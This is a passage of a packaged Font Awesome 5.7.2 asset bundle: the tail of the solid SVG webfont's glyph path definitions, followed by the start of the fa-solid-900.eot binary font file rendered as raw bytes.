c-12.4004 -12.4004 -21.7002 -14.0098 -34.7002 -16.2305c-14.4004 -2.46973 -32.3203 -5.5498 -51.9199 -25.1396c-19.6006 -19.5898 -22.6699 -37.5205 -25.1504 -51.9199c-2.21973 -12.9502 -3.80957 -22.29 -16.2197 -34.7002s-21.71 -14.0098 -34.71 -16.2305
c-14.4004 -2.46973 -32.3203 -5.5498 -51.9199 -25.1396c-2.58691 -2.58691 -4.68652 -7.65625 -4.68652 -11.3145c0 -8.83301 7.16797 -16.002 16.001 -16.002c3.65918 0 8.72852 2.09961 11.3154 4.68652c12.4004 12.4004 21.7598 14 34.7002 16.2305
c14.3994 2.46973 32.3301 5.55957 51.9297 25.1494c19.6006 19.5898 22.6699 37.5205 25.1396 51.9199c2.23047 12.9502 3.83008 22.2998 16.2305 34.7002s21.75 14 34.7002 16.2197c14.3994 2.48047 32.3193 5.56055 51.9199 25.1504
c19.5996 19.5898 22.6699 37.5195 25.1494 51.9199c2.23047 12.9502 3.83008 22.3096 16.2305 34.71s21.7598 14 34.7002 16.2305c14.4102 2.46973 32.3301 5.5498 51.9297 25.1396zM31.4404 125.82l-11.5508 11.5498c-24.9893 24.9902 -26.6592 63.8398 -3.71973 86.7803
l207.68 207.68c22.9404 22.9395 61.79 21.2803 86.79 -3.71973l11.54 -11.5508zM480.56 258.18l11.5508 -11.54c24.9893 -25 26.6592 -63.8496 3.71973 -86.79l-207.68 -207.68c-22.9404 -22.9395 -61.79 -21.2803 -86.79 3.71973l-11.54 11.5508z" />
    <glyph glyph-name="ice-cream" unicode="&#xf810;" horiz-adv-x="448" 
d="M368 288c26.4961 0 48 -21.5039 48 -48s-21.5039 -48 -48 -48h-288c-26.4961 0 -48 21.5039 -48 48s21.5039 48 48 48h0.94043c-0.519531 4.51855 -0.94043 11.8779 -0.94043 16.4268c0 79.4883 64.5117 144 144 144s144 -64.5117 144 -144
c0 -4.54883 -0.420898 -11.9082 -0.94043 -16.4268h0.94043zM195.38 -45.6904l-99.3799 205.69h256l-99.3799 -205.69c-4.66504 -10.1084 -17.4863 -18.3135 -28.6201 -18.3135s-23.9551 8.20508 -28.6201 18.3135z" />
    <glyph glyph-name="laptop-medical" unicode="&#xf812;" horiz-adv-x="640" 
d="M232 224c-4.41602 0 -8 3.58398 -8 8v48c0 4.41602 3.58398 8 8 8h56v56c0 4.41602 3.58398 8 8 8h48c4.41602 0 8 -3.58398 8 -8v-56h56c4.41602 0 8 -3.58398 8 -8v-48c0 -4.41602 -3.58398 -8 -8 -8h-56v-56c0 -4.41602 -3.58398 -8 -8 -8h-48
c-4.41602 0 -8 3.58398 -8 8v56h-56zM576 400v-336h-512v336c0.0771484 26.4189 21.5811 47.9229 48 48h416c26.4189 -0.0771484 47.9229 -21.5811 48 -48zM512 128v256h-384v-256h384zM624 32c8.83203 0 16 -7.16797 16 -16v-16
c-0.104492 -35.2236 -28.7764 -63.8955 -64 -64h-512c-35.2236 0.104492 -63.8955 28.7764 -64 64v16c0 8.83203 7.16797 16 16 16h239.23c-0.230469 -14.5303 14.0791 -32 32.7695 -32h60.7998c18.0303 0 32 12.1904 32.7402 32h242.46z" />
    <glyph glyph-name="pager" unicode="&#xf815;" 
d="M448 384c35.3281 0 64 -28.6719 64 -64v-256c0 -35.3281 -28.6719 -64 -64 -64h-384c-35.3281 0 -64 28.6719 -64 64v256c0 35.3281 28.6719 64 64 64h384zM160 80v48h-80c-8.83203 0 -16 -7.16797 -16 -16v-16c0 -8.83203 7.16797 -16 16 -16h80zM288 96v16
c0 8.83203 -7.16797 16 -16 16h-80v-48h80c8.83203 0 16 7.16797 16 16zM448 224v64c0 17.6641 -14.3359 32 -32 32h-320c-17.6641 0 -32 -14.3359 -32 -32v-64c0 -17.6641 14.3359 -32 32 -32h320c17.6641 0 32 14.3359 32 32z" />
    <glyph glyph-name="pepper-hot" unicode="&#xf816;" 
d="M330.67 184.88h107.46l37.0498 -38.54c-48.5293 -87.4697 -206.54 -210.34 -419.18 -210.34c-30.9121 0 -56 25.0879 -56 56s25.0879 56 56 56c141.58 0 163.44 181.24 221.92 250.82l52.75 -24.2207v-89.7197zM461.76 313.25
c27.7324 -25.2861 50.2402 -76.2676 50.2402 -113.798v-0.142578c0 -13.6797 -2.2998 -26.6895 -5.55957 -39.3096l-54.6807 56.8799h-89.0898v78.2402l-74.6699 34.29c22.3398 14.0498 48.3398 22.5898 76.3398 22.5898
c16.4658 -0.00683594 42.0732 -5.36523 57.1602 -11.96c18.4502 37.2197 8.25977 61.96 1.40039 72.3203c-0.787109 1.14062 -1.42578 3.19043 -1.42578 4.57617c0 1.82227 1.03711 4.35449 2.31543 5.65332l22.9004 23c1.29688 1.31836 3.85156 2.38867 5.70117 2.38867
c2.1123 0 4.90234 -1.33398 6.22852 -2.97852c18.5596 -23.4805 35.2998 -71.9102 3.13965 -131.75z" />
    <glyph glyph-name="pizza-slice" unicode="&#xf818;" 
d="M158.87 447.85c181.91 -17.1699 332.02 -164.93 352.899 -345.71c1.87012 -16.2197 -7.89941 -31.54 -23.6191 -35.8994l-56.9404 -15.7803c-7.94043 186.39 -134.86 311.51 -322.479 317l14.8096 56.2705c4.12988 15.6992 19.1699 25.6396 35.3301 24.1191z
M100.4 335.85c176.069 -1.95996 294.88 -119.25 299.149 -294.14l-379 -105.1c-1.1709 -0.324219 -3.1084 -0.587891 -4.32422 -0.587891c-8.94824 0 -16.21 7.26172 -16.21 16.21c0 1.1582 0.239258 3.00781 0.53418 4.12793zM128 32c17.6641 0 32 14.3359 32 32
s-14.3359 32 -32 32s-32 -14.3359 -32 -32s14.3359 -32 32 -32zM176 184c17.6641 0 32 14.3359 32 32s-14.3359 32 -32 32s-32 -14.3359 -32 -32s14.3359 -32 32 -32zM280 80c17.6641 0 32 14.3359 32 32s-14.3359 32 -32 32s-32 -14.3359 -32 -32s14.3359 -32 32 -32z" />
    <glyph glyph-name="trash-restore" unicode="&#xf829;" horiz-adv-x="448" 
d="M53.2002 -19l-21.2002 339h384l-21.2002 -339c-1.55469 -24.8369 -23.0146 -44.9971 -47.8994 -45h-245.801c-24.8848 0.00292969 -46.3447 20.1631 -47.8994 45zM123.31 156.8c-10.0791 -10.6201 -2.93945 -28.7998 11.3203 -28.7998h57.3701v-112
c0 -8.83203 7.16797 -16 16 -16h32c8.83203 0 16 7.16797 16 16v112h57.3701c14.2598 0 21.3994 18.1797 11.3203 28.7998l-89.3809 94.2598c-2.52441 2.72949 -7.5918 4.94336 -11.3096 4.94336s-8.78516 -2.21387 -11.3096 -4.94336zM432 416
c8.83203 0 16 -7.16797 16 -16v-32c0 -8.83203 -7.16797 -16 -16 -16h-416c-8.83203 0 -16 7.16797 -16 16v32c0 8.83203 7.16797 16 16 16h120l9.40039 18.7002c3.58984 7.3418 13.1357 13.2998 21.3086 13.2998h0.0908203h114.3h0.0175781
c8.20215 0 17.8262 -5.95801 21.4824 -13.2998l9.40039 -18.7002h120z" />
    <glyph glyph-name="trash-restore-alt" unicode="&#xf82a;" horiz-adv-x="448" 
d="M32 -16v336h384v-336c0 -26.4961 -21.5039 -48 -48 -48h-288c-26.4961 0 -48 21.5039 -48 48zM123.31 156.8c-10.0791 -10.6201 -2.93945 -28.7998 11.3203 -28.7998h57.3701v-112c0 -8.83203 7.16797 -16 16 -16h32c8.83203 0 16 7.16797 16 16v112h57.3701
c14.2598 0 21.3994 18.1797 11.3203 28.7998l-89.3809 94.2598c-2.52441 2.72949 -7.5918 4.94336 -11.3096 4.94336s-8.78516 -2.21387 -11.3096 -4.94336zM432 416c8.83203 0 16 -7.16797 16 -16v-32c0 -8.83203 -7.16797 -16 -16 -16h-416c-8.83203 0 -16 7.16797 -16 16
v32c0 8.83203 7.16797 16 16 16h120l9.40039 18.7002c3.58984 7.3418 13.1357 13.2998 21.3086 13.2998h0.0908203h114.3h0.0175781c8.20215 0 17.8262 -5.95801 21.4824 -13.2998l9.40039 -18.7002h120z" />
    <glyph glyph-name="user-nurse" unicode="&#xf82f;" horiz-adv-x="448" 
d="M57.7803 160c-8.82227 0.00976562 -15.9814 7.17773 -15.9814 16c0 2.09277 0.761719 5.30957 1.70117 7.17969c15.2305 29.8203 31.2803 62.2305 42.1699 95.54c7.58008 23.1904 10.3301 47.6904 10.3301 72.0801v49.2002l128 48l128 -48v-49.2002
c0 -24.3896 2.78027 -48.8896 10.3496 -72.0801c10.8701 -33.3096 26.9199 -65.6895 42.1504 -95.54c0.939453 -1.87012 1.70117 -5.08691 1.70117 -7.17969c0 -8.82227 -7.15918 -15.9902 -15.9814 -16h-82.3594c-22.5107 -19.6797 -51.6201 -32 -83.8604 -32
s-61.3496 12.3203 -83.8604 32h-82.3594zM184 376.33v-16.6602c0 -2.75977 2.24023 -5 5 -5h21.6699v-21.6699c0 -2.75977 2.24023 -5 5 -5h16.6602c2.75977 0 5 2.24023 5 5v21.6699h21.6699c2.75977 0 5 2.24023 5 5v16.6602c0 2.75977 -2.24023 5 -5 5h-21.6699v21.6699
c0 2.75977 -2.24023 5 -5 5h-16.6602c-2.75977 0 -5 -2.24023 -5 -5v-21.6699h-21.6699c-2.75977 0 -5 -2.24023 -5 -5zM144 288v-32c0 -44.1602 35.8398 -80 80 -80s80 35.8398 80 80v32h-160zM319.41 128c71.4902 -3.09961 128.59 -61.5996 128.59 -133.79
c0 -32.1318 -26.0781 -58.21 -58.21 -58.21v0h-331.58c-32.1318 0 -58.21 26.0781 -58.21 58.21c0 72.1904 57.0996 130.69 128.59 133.79l95.4102 -95.3896z" />
  </font>
</defs></svg>
PK!������%fontawesome/webfonts/fa-solid-900.eotnu&1i���t��LP�vvu�2Font Awesome 5 Free Solid
SolidJ329.474 (Font Awesome version: 5.7.2)2Font Awesome 5 Free Solid
�PFFTM�qq�XGDEF*��8OS/2C��X`cmapA6M\
gasp���0glyf� �#*z�head���6hheaC$hmtx0u���loca.�h�maxp�8 nameI�2���%post�zƱ��-_IyX�uvv_<�؈��؈��������������� @��LfGLf��PfEd���/���.�T�:� ������@�`����@@��@��@������@@�����������@�`?�@�����@���@?��������@���@�@��@��������?@��@��4�@������@�@@���������������������������?@��@
@
?
�@�@���`�������������@@@?@��@���@����@������@`��������?���������@����?@ ��@��@�������������������������������������������������������@������� ��@@��??������� � ��@� �  ���������@@���������@������������ ��@�@������������@����@��@���������@�������
��
��
@���@@��@��@�`@������@@���@����@���������@�?����@���@@@��?����������������������@@�������@�������������� ������������������?�������������������@@��������@���������������������@��h��������@�@��������@�����@@��?���@�@��@����������������������@ @���������@@�����������������������@������������������� ������������@�����@�����������@���@������ �@���@�����������@��������@�����@���������@��?@�������������������@��@����?��@��@�@���?���?���������@����������� ����������@������ �����������@����������@�@@�� ��� ��
	�vv���������>�D�N�[�^�n�|��������������������������������"�.�1�5�:�>�D�F�K�N�Y�^�e���������������������������������-�6�9�I�N�]�l�w�z�������������������������������������(�8�[�]�`�b��������������������������4�6�:�<�?�A�C�E�G�K�N�P�S�X�]�_�b�f�m�r�t�y���������������������������	�����������������������������������!�0�7�<�A�D�G�J�O�Q�U�X�^�b�f�k�m�o�t�v�y�|�����������������������������������������������"�)�/�=�@�C�G�M�S�V�[�_�i�k�s�}�����������������������������������������������������*�/�����������!�A�H�P�^�`�p���������������������������
���� �$�0�3�7�=�@�F�J�M�P�[�`�����������������������������
���!�3�8�@�M�Q�l�q�y����������������������������������	��(�7�X�]�`�b��������������������������3�6�9�<�?�A�C�E�G�K�N�P�S�X�\�_�a�f�h�p�t�w�}�������������������������������������������������������������!�.�7�;�A�D�G�J�O�Q�S�X�]�b�d�i�m�o�t�v�x�{������������������������������������������������"�(�.�;�@�C�G�M�S�V�Z�^�i�k�r�|�����������������������������������������������������)�/����������������������������������������������������|{zywjihd`]TSRQNEDCA?431,+%" 
�����������������������������jigfH&


�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
}
|
{
z
t
f
a
]
[
Z
Y
X
P
L
J
H
F
0
#
"
!
 
















������������������������������������xusrpfedcba^[YXUSLKI?>982/*&
���������������������������������������~zL�X�\���@�h		�
�|��
4
� �� �X��Dd���P�`�d$��H���|P�  d �!!�!�"P"�"�#8#p#�$$$l$�%%`%�&&|&�'l'�(�))x)�*<*�++�,T,�,�-�-�.�/0/�0 0�1h1�2�3�3�4�4�505�6|6�7$88�9P;�<\<�==�>�?,?�@@|@�A�BB�CpD(D�E�FHF�G0G�HH�IdJlJ�K$K�L�M�M�NHN�OpPP�P�QLRS�TlUU�VV�WPW�W�W�XXpX�X�Y$Y�ZHZ�[L\$\�]�^__�`L`�aHbTc8dd|e e�f f�g4g�hDh�h�i$ili�jTj�j�k�l l�l�mtm�nTn�ptqtq�r�ssXs�t�u�v8v�v�xyypz@z�{�| |�}l}�~,~�~���L����T��L������X��� �x����� ���d���|�������|�h�L�0�$�������|�0��������H����P����4�X�|�l��������������4�����\����D���������������D����� �����<����� �������`���p�8���0��p�������(�P�0�������L���@���|���X�Ȭɠʀ�`�8���l���H΄ϔ�@���d����0Ӡ��|���0��֜�p���,�@���l��t�ܸ�@ݰ�`�߈�P���8����P��P��T���p��8����t�P��������������l� ���X�������@�����H������L�T|D�x��	�
l
�H�@��
x
�L��P�����l�,�\��(�x��h�P���8� L �!p!�"�#H$%,%�&,&�&�'|(8)p**x+ +�+�,�-./00�1x22�304\4�5`66�7@7�8T9::�;�<X<�=@=�>�?0@d@�A�BB�C�DPD�ElF�GPHH�I�J�KlL,L�L�M�M�N�OdO�PDP�Q�RHR�T4T�UlVV�W8W�XhX�Y�Y�[�\L\�^^�^�_�`8`�aLa�b�c|d$d�ee�fDf�gglg�hLh�i�j@kTk�l,l�m\nnpn�o�p�q`q�r�s�tPt�upu�vlw8xx�yly�zh{{p||�}�~(~�(�\� ���������d�L���h�h������������������������0�����(���P�(�L�(���� ���l���p���H�l�������,�������D������(����������P��p����������� ����������4���T���8���@��¤�Ð�H���p����t���Ɍ�T���X�D��D��d���(ј�@��ӈ�h���D��֘��؜�$�8�(�����t߈������H�������h��|������ ����(��4��H�(�����<����������X4��		�
<
�pT
@H��P��x�`0�8(�`������$!",#T#�$p&�'(((�)�*T+L+�,0--�.D//�0l0�2 2�4P55�6�77�9<:;@<�>d?�@|A�BhCXD�E�FHGG�I4I�J�LL�MxNN�O�Q8R8R�TT�U�V�WX�X�YLY�ZL[�\4\�]@]�^l__�`�a�bXb�cLd4ee�f�g�h�j`k�k�l�mXnn|o|pphp�qpq�r�r�sxt$t�u�vv�wDw�x�y$y�z������32+"546;5'&63!2��8�8������**���"&46325"&463247%68P88(�8P88(@���%%6%�K�%%6%^���!%"/&=#"&46232&264&"�d8HVzz�z,
�jKKjKd
,z�zzVH8KjKKj�����"/&6767>�/+�

�+/)k&&k�(|+�

�+|(#	''	��1�62/&?'&6?	(	A�j �� j���&g�	DD
�g&����$"&4622#!"&=46;27jKKjK&7O��O7#L#�KjKKjkO7**7O	�/;GS_kw��2+54+"!54+"#"&546;;2=!;2=54+";2=4+";2=4+";254+";2=4+";254+";2=4+";2=4+";2�

(��(

(@(��((((((����p((((((�
��

P
��((l((l((�``�``�((l((l((���/?32+"&=46#2+"&=46346;2+"&5"&=46;2#(�

�
F

�


�

�
(

�

�
�

�

�

�
��

�


�

�
	��� 0BRbr��+"&=46;2+"&=46;2746;2+"&5#+"&=46;22+"&=46346;2+"&5%"&=46;2#"&=46;2#%46;2+"&5�
e

e
�f

f
 
e

e
 f

f
�

e


e

e
�

e

e

e

��
f

f
�P

P
�
P

�

P

	
P

�
P

P
�

P

�
P

P
�
P

P
h

P

���/?O_7+"&=46;246;2+"&52+"&=463"&=463!2#463!2#!"&5"&=463!2#�
e

e
�
e

e
}

e

�



��


��




�P

P
�

P

�
P

P
�@
P

P
�

P

�
P

P
7'&4?62762"��%p�%��	�$p�$����aq#7"/"/&4?'&4?62762�d		
	dd	
		dd		
	dd	
		�d	
		dd		
	dd	
		dd		
	���5=++"=#"=4;54;232"/&=#"&46232&4&"208 88 8�d8HVzz�z,
d�PpPPp 88 88��d
,z�zzVH8d�pPPpP���%-+"=4;2"/&=#"&46232&4&"20���d8HVzz�z,
d�PpPPp  ��d
,z�zzVH8d�pPPpP����)9#".54>7632654&'.?>+"&=46;2�08�gCrC. 	
bFEc$ _
 

 
�"k=g�BrD)L>	"'EcbG'G	�

�

��h�/?O72+"&=4632+"&=463%2+"&546372+"&546372+"&5463�		0		P		0		0		0		�		0		�		0		�	�		�	`	`		`	�	��		 	`	��		�	`	� 		�	����<D%/'&=&''&'&?&47'&767667547676264&"�	&+"	76
"*	&	**	&	*"	77	"*	&	*�B//B/�
5)1

1)5	$
5)1

1)5
##-/B//B����A�D62+"&=4.+"+"&=%#"/&"#"/&54?62546;2�	p	@		p	����"
Z8,��	
`	`
	�1���JI�����2"&4?6/54+"�Α�Α1
	@0��Α���	'
.����E�"0B%+'4&+"#"&76;;265'32;26/&+"2>5'4&+"3=�	D��bb�((7	.	-bb@4,,�00���+3;3232"/&6;546#!"&=46;2?324&"264&"2�P
X
	��	

X2
�0

�1*1�
|L�
�	��	�
��p

p
11j@�%#!"&=4?>3!23373'8� j
��U{ p {U����

+�@@����/2+"&=463.#"3276#"&54>32'463��eM-IggIC1	"	
G_g�BsC8b#��/$*g�g,"	@�gCrC.)R���'N46;2+"&=463.#"+".5>322676;2#"&'+"=46;2#'�/�eM->_
1�Z8b#�>_
1Eh<8b#/�fM��/$*L;	Ws.)��L;		9\5.)R�/$*���'3?K!"&5463!2"264"264"264754+";254+";254+";2�`���""""""������� `��h""I""I""�  T  T  ����%2#!"&=46;5462#54&"���Y~YP*<*���H?YY?HH**H���'276#"&#"+"&5&54662^0E;?$h>4

"!Gh] �	)#^

�!

#���12+"&=46;254&"6;2+"&/.=4�Ԗ
A-

/!q�q!/

-A
��j0-?
�
"OqqO"
�
?-0j���6/#"&=46;�Yf

fy��Y
�
����#6/#"&=46;.6764'.>�Yf

f�				x��Y
�
)0).��@�'>P6/#"&=46;%.67>54&'.>&'&67>4.'.>.6764'.>�Yf

fB<DD<	!/91	(-)			
)a				y��Y
�
�'~�~'=J';h!�`S	$,.,$6)0).	����#'+=3'3573#75#53'35%3#5##5333#'3#��@����@����@  ` @`@  @  ��@@@�@@@�����@@@� `� �   �#'+/37;?13333333333333333333333333333333			$										���������������������������������������������������=46;2"/&6"264���(��((���(���((����)%"/&=46;2264&""'764/32��(���((2�(��1��(����((���J��(����#/8%#!"&5463!2;2=4+";2=4+"&7!"3�		
��(88(H
���������

X4
8(@(8
nF�  ����
463!2' �@��0p���#'082+#!"&=#"&=4635463!25!%5#"&=#264&"�%	0
��
0	%

	.	@�0	�&%p	`

`	p%�
	.	
��``�`	0�H���"*#!"&546;7>;2324&"26"&462�`X

~X�FdFFd&4H44H0�� !	!�dFFdF�H44H4����+2%2+"&=46;'#32+"&=46;6;2'3'&'�		�		�		�		�H��c) 	 		 	QQ	 		 	u���|��x�",7%+"&=46;#"&=46;2'32654'&#>54&+321!&2'(�		!!		�2 $�M-"UQ�8',C	 	?	!	8$3�q$
��""���*� 72+"&?6;#".?6;2+�

�	
(>"
�	
)>  
 
@	 
 
����C�-G!2+"&=#32+"&=46;#+"&=46+32/&6;5#"&?6 		#	7"		�		"7	#		�P00PP00P�	`		0��	 		 	@0		`	P�PP�P������-G!2+"&=#32+"&=46;5#+"&=46&=#/&?63546�		#	w"		�		"w	#		�P�PP��	`		0�	 		 	�0		`	��P00PP00����/?#!"&=463!2463!2#!"&5"&=463!2#'2#!"&=463 	�			��	�		�`			�		�		�		�(		(		�		(		��	(		(	�	(		(	����/?+"&=46;2"&=463!2#"&=463!2#'2+"&=463`	�		�	��		�		�`		�		`		�		�(		(		�	(		(	�	(		(	�	(		(	����/?5463!2#!"&"&=463!2#"&=463!2#%"&=463!2#�			�	�		�		�`		�		�				l(		(		�	(		(	�	(		(	�	(		(	����/?5463!2#!"&"&=463!2#"&=463!2#%"&=463!2#	�		�`			�		�`		�		�`		�		l(		(		�	(		(	�	(		(	�	(		(	���/?O_5463!2#!"&"&=463!2#"&=463!2#"&=46;2#"&=46;2#"&=46;2#�	`		��			`		��		`		� 		@		@		@		@		@		L(		(		�	(		(	�	(		(	4	@		@	�	@		@	�	@		@	������/?J5463!2#!"&"&=46;2#"&=463!2#'"&=46;2#%&?6'	�		�`	�		�		�`		�		�		�		�U`l(		(		�	(		(	�	(		(	�	(		(	Y`�����/?J5463!2#!"&"&=463!2#"&=463!2#%"&=463!2#%&=46	�		�`	�				�`		�		�				��`l(		(		�	(		(	�	(		(	�	(		(	o`�@�2#!"&54636/5P���"#n��� &�K��")"&5463!2"264!5'&'&�`���.!!.!h�X�8H ��H!.!!.�pX�8H����.5462"�="
p�p
"=6#X$5"PppP"5$X#
����
6462"7264&#�Α��gLllLYΑ�Α@l�l��`�!"&54>762264&#"&54&"�6,!g�g!-5-		!/		B�4_6I&JhhJ&H8^4�@		/!		.B��@�7.?67/&?624?6#!"&5463!2+!�Z�\
��$Z$ �(��(�@mZ�
\� #Z#��(�`(��@����4;276/+"@0�%%�0���
��
�����54;27676//+"(�%�%%�%�(h��
��
��
��
�����7&4?6'7&4?6'�%%@�%%�

�
��
�

�
��
����%&546���13�6������#"&546;2%+"&546;2�`````��0`����2#!"&5463������`���%&546&546��%%@�%%�

�
@
�

�
@
���+"=&=&54654654;2(�%�%%�%�(t����
��
@
��
��@����+"=&54654;2�0�%%�0��X��
�
��������%#!"&=463!2%"&?62#�
��

�
�p�*�@@

@
39��9��%�?62"/&4#�����������%�%"/.?'&6?62�������������#2"&454+54+"#";;2=32�Α�Α�\8\\8\��Α�΃8\\8\\����2"&4!2=4#!"�Α�Αt����Α�Ώ88����#2"&4'76/&'&??6�Α�ΑrBB(	AA	(BB(	AA	(��Α�ΨAA	(BB(	AA	(BB(����"&46276/&'&��Α�΄��Fh'Α�Α����Fh����+3"&462"7>32;2=4>54&"264��Α��`J+	#	

8H &&'Α�ΑR@		



	&*<�&&����'2"&4$"26454+54+";#";2�Α�Α	""@X��Α��#""�d@���(PX%2++"=.'#"=4;>754;2>7#"=4;.'+"=32+54;24"&462�3N.(FeeF(Fe�,?
))
?,(,?
))
?,(�(.N3eF(FeeF�
?,(,?
))
?,(,?
)y����
2"&4.67�Α�Α�`�4&��`�4��&��Α��`&��4`&4������%"/&4?62!2#!��x

��x��s
 
s����762"/&6?!"&=463!'.���x��

x}��s
 
s����7'&4?62&/+"&5#��s
 
s���x��

x����%"/&4?646;27>���s
 
s���x

��x���&='.54>7546��1D2
#02LP4�

X*@+U,,B)	P
����!2C546;2++"%4;2+"=#"52+"=4;543+"&=4;232
|T( |
(T�
|T�|
(T|
(T�
|T�|
(T�
|T����!2C#"&=4;232%+"=4;54;2+"=#"=4;2+"=46;2+�|
(T��
|T((T|
�(
|T
|T(
(T�XT(
||
(����#%2++"&=#"&=46;546;2�

�
 
�

�
 
�
 
�

�
 
�

����%2#!"&=463�

��

�
 

 
����6%/+"&?&/&6?'.?>'&>;276�	�&�	��	�&�	�r	"	T��T	"	NN	"	T��T	"	N����"&462"264';2574&+"��Α��T&&Z0@'Α�Α��&&������
.9C353#"&53#2#!"&=46;&54632>32!3.#"3264&#" ��
�
 
	� 	
,
4$..$4
��V#!� ����
@
P		P
$4 $$ 4$5"$%����@�'&'.7>3264&#"&546;26762"�u8[5	 @Q}G		�upPP/O�BN��	.%,.
/>0"		TPp/)����!"&547632654.676�#11#q�q7%&
"�2,2M/OqqON9U&% "*=%
@�-%#".'&47>22654&"72"&54732654'6=*�[<oV*����<TTxTT<(88O9	�Pa-O5Paa�T<<TTxT�8O99'
	����3J%27#"&'&4767#"'&54?632>32'654&#"654'6320@

4)%[�*i'@_���57[�*
0IT<6I	

'80)
aPQ%=#:�c
aP<9<T98'����H�!%#!"&762"264';2574&+":
� 
�8&&Z0@00���&&�������@�*2++"&?#+"&?'&6;23'&>;2�BBri	B	1g+(	  	(+g1B	i'2'�
�:ll:������	!-9EQo!#!"&%;2=4+";2=4+"';2=4+";2=4+"';2=4+";2=4+"2!546;546;23546;2���@((((�((((�((((P�@0	 	�	 	���((�((t((�((t((�((@000		00		0���;%&=#"/73546%"=4;2'!#+"=4;76;546&5�P;F55 �coF55  �oT�;PPYP(K:9(g8K:9�8�(PP�����2#"'#"&'&>7&54�Ԗ�j83AL9�z�z319JV���?#"=46;2%+"&=46;232".54546;226=46��hW�h��Nt{tO�2<2 PPP|,	Ht;;tH04-44-4;�E/&/&4?62�����=����;�E7'&4?>76"�����C������}�!C%"/&4?625#"/&6;2762+"&="/&4?62"/32vee(�	�
(���
(ee(�	hdd+�
�+
�+dd+���B�.%#!!2"&547#"&547#"&=46;2!2��
 !.!�!.!FF

g
	�� #!!!! W

-�2#!"&546;��`�@@� @D� %#!"&?>3!2%"46;32=I!�pI!��T 	E�@��|
|
8v@0�/?T%"&=46;2#3"&=46;2#!"&=46;2#3"&=46;2#2#!"&546;2M&:&��&:&�		�0
	 	�����FF��@	 	
P		�����-5=M!2#!"&546";2=4#2=4&+"#"3264&"62"&4265463264&#"0��`	t@	���dFFdFTH44H4!	
		&���` 	
`J	-$��FdFFd�4H44H4	
		&���"*#"'+++"&=4?&54>32264&"gI%
(
p
�	/Q0Ig�((Ig(
(

N
�0Q/g((������;C����'&'&?&'#"'&76;67'&767667632+/'>'&/'.=&''&'&?&7'&76766754676276>.6'&'&?&'#"'&76;67'&767667632+/'>'&







&	
&	g"	!
&&	
 
!!
 	&&
 
"{#0#0	







&	
&			
			
	

	>##�
(
""
'
 
'

"	
"&
50#0#�		

				

		>##����B�+#"'#"&'&767&5462#"'#"&'32654'�zV<3+.&z��.+3<@hc�9HB�^")3B^��"
6,qO	Q13�� �
&?'&6?6 � j�A	��HD	�g&�����,%+"/&=#"&546?#"&=463!2+*&
�
�
0&*



*� -
h00h
$<v
0

0
��@�19A232#!"=46;5.'&'&=46;5463!2&'#%5#676(
>0>%0%��%0$>0>
h

��@�@#�
88-"4HH
&"-88
(

(�
)--)
���/7?%#"&=#"&?62+7#!"&=46;;26=324&"264&"2(P
X
	��	

X�
�0

�!P!�
|L@
�	��	�
p

p
!!j�����#7&.7>&>676>.2327>�"		
'BF:;-+
+"		
'BF:;-+
�4j
^�"+
+-;:FB'
		"+
+-;:FB'
	c
j4,^�����#"/&?6>7'&?6���p1;[<0����h0<\:2p����.2#!"&54632654/"#"'&#"���.x�A
%#KF	���`���x	FK#%
A����&%2#!"&=46;5462+"&=4&#"���Y}Z
 
+*���f@ZY?

*+g��@�	!+=!#!"&7;2=4+";2=4+"!5463!2@� ����HH�����X((((00����16"&462+"&5.'"&=463+"&5.'"&=463�%5&&5�	0	wT	
t��	0	ː	
V�sF;5&&5%o
	Tw	0	�t
	��	0	Gr�@�&.%#!"&=463!2'!"7>3!2&"264&"264@� �0� a
a3s�``<�

�`��@�,4$#"/&++"'&547#"&=46;2?632#2@ 	UBUK"%%�UBU	@!TkkT�J�
D5+"#5:%`%5D
��C`C�����;%//&/&?'.?'&6?'&67>7676�.

?>	--	>?

..

?>	--
>?

�-
>?
..
?>
--
>?
//

?>
�'7?%+#*#"&'.=47>763232+"&=46;24&"2d

##GE
	��`
0

0
�
+% $
	�

-+
�

�
��&6>3&'&632#*#"&7.7.7#"&54632+"&=46264&"-�	
EG#('

d�0

0
$
+-

�	
$$#%+

�

�
�������'7?2666+"'.'&54654632+"&=46"264�
+%#$$
�

-+
�

�
��d

'(#G
E
	��`
0

0
������&6>5&547>76;2'''#"&546;2+"&64&"2\
+-

�	
$$#%+

�

�
��	
EG#('

d�0

0
����%"&462'326=4&+764/&"2?64gΑ�Α�L�

�L��8�Α��H

H������%2"&47#";2?64/&"�Α�Α�L�

�L����Α��H

H������%6462"'7;26=2?64/&"2�Α��H

H��YΑ�Α�L�

�L������%"&46254&+"'&"2?64/&"��Α��H

H��'Α�Α�L�

�L��	����
"+17=#>2473#%#&'%#>#64'#&4733"&673%3.P�0:0���Bl#5S��$lSk		r�r		r(�0:0�$lS��l#5S DTT�@  @ �\2K[2\3K�    !>!@"!>!!DTTJ2\3K~\2K�����$'"&4?&67>76264&"�	P&�5%�
J$JDK
�<S$I
�%5�%Q	
KDJ�������/7HY"&=463!2#"&=463!2#"&=463!2#$2"&4/&?676/&?676�		 		��		 		��		 		�<((�H		/			@		H		/			@	<	(		(	�	(		(	�	(		(	T((GH		0			?			�H		/	?		�����2/&='&63��P
�����
8��'+%53#!"&=3;2672!546;546;2#5#@��`�	`	��P�@�p0��0		�PP00  �����;%"/&6;5#/&4?635#"&?62+3546&=#32`OO3eOOe3
OO3eOOe3
OOe3OO
3eOOe3OO
3e����&:H6"&462"&4622+.'63*&4622#!"&=46;27'#"&=46;2z4&&4&�4&&4& &
B �\BB\B#0C��C0	!F!�(B
&@�&4&&4&&4&&4F& 
*!B\BB\bC00C
:#
 &�����%K"&4?62?64'&'&5&?66&'&'&?>'&"&'&4?6G,,D,~Y,&	
<C	jY,&	
<C	
,,D,-~,D,Y~,&
	;C<
�Y~,&
	;C<
	-~,D,����%#!"&5467454632632.K5��<T6*^B,J(8�$65KT</JB^,$8(����%%#!"&?5#"&=46;2+3'&=#�(*��*(u

�

��0@,#II#��



�iN
��
����'/7%"/"&46327'#"&462762264&"264&"�		Ft8P88(!!(88P8tF		����	s(88P8!!8P88(s	F������#,!#!"&546;3;#!"&546;#532@
��

H!�
h
��

�y`
(

p
��!X
��

p
I
